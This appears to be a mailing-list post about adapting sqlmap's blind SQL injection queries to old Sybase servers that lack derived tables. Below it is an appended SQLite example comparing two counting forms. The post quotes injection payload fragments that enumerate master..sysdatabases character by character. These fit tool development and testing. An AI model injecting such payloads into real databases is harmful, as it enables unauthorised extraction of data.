Hello,

Recently I've run into an issue with sqlmap and a pre-12.5.1 Sybase DB. It
seems pre-12.5.1 Sybase DBs do not support derived tables (e.g., SELECT *
FROM (SELECT example from table) as name). sqlmap uses these when
enumerating the table so it quickly runs into syntax errors. The feature
announcement for derived tables in 12.5.1 is below:

http://manuals.sybase.com/onlinebooks/group-as/asg1251e/whatsnew/@ebt-link;pt=584?target=%25N%14_1010_START_RESTART_N%25

I took a quick look and some of the basic queries can be rewritten, e.g.:

AND ASCII(SUBSTRING((SELECT
ISNULL(CONVERT(NVARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT DISTINCT
mmlP.name FROM (SELECT name FROM master..sysdatabases) AS mmlP) AS
value_table),3,1)) > 1

to

AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),(SELECT
COUNT(DISTINCT name) FROM master..sysdatabases)),CHAR(32)) ),3,1)) > 1

However, I'm unclear if this would work in all cases (and if so, how it
could be done cleanly). Thoughts?

Brian
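
Added example, not part of the original message and not sqlmap's code: a check of whether the flattened COUNT(DISTINCT ...) form returns the same value as the derived-table form. It uses SQLite as a stand-in for Sybase (an assumption; behaviour on ASE is not verified here), a constructed table named t, and a hypothetical NULL-safe variant, and it shows the one case where the two forms differ: NULL values in the counted column.

```python
import sqlite3

# Derived-table form, shaped like the query in the message (table name is constructed).
DERIVED = ("SELECT COUNT(*) FROM (SELECT DISTINCT p.name FROM "
           "(SELECT name FROM t) AS p) AS value_table")

# Flattened form from the message: no derived table needed.
FLAT = "SELECT COUNT(DISTINCT name) FROM t"

# Hypothetical NULL-safe variant: COUNT(DISTINCT col) skips NULLs, while
# SELECT DISTINCT keeps one NULL row, so add 1 when any NULL is present.
FLAT_NULL_SAFE = ("SELECT COUNT(DISTINCT name) + "
                  "COALESCE(MAX(CASE WHEN name IS NULL THEN 1 ELSE 0 END), 0) "
                  "FROM t")


def compare_counts(names):
    """Load `names` into a one-column table and return the three counts
    as a tuple: (derived, flat, flat_null_safe)."""
    con = sqlite3.connect(":memory:")
    try:
        con.execute("CREATE TABLE t (name TEXT)")
        con.executemany("INSERT INTO t VALUES (?)", [(n,) for n in names])
        return tuple(con.execute(q).fetchone()[0]
                     for q in (DERIVED, FLAT, FLAT_NULL_SAFE))
    finally:
        con.close()


if __name__ == "__main__":
    # Constructed sample data, not taken from any real server.
    samples = {
        "no NULLs, duplicates": ["master", "tempdb", "master", "model"],
        "with NULLs": ["a", None, "a", None],
        "empty table": [],
    }
    for label, rows in samples.items():
        derived, flat, safe = compare_counts(rows)
        status = "same" if derived == flat else "DIFFERENT"
        print(f"{label}: derived={derived} flat={flat} "
              f"null_safe={safe} -> {status}")
```

For a NOT NULL column the two forms agree, so the simple rewrite is only a concern where the enumerated column can hold NULLs.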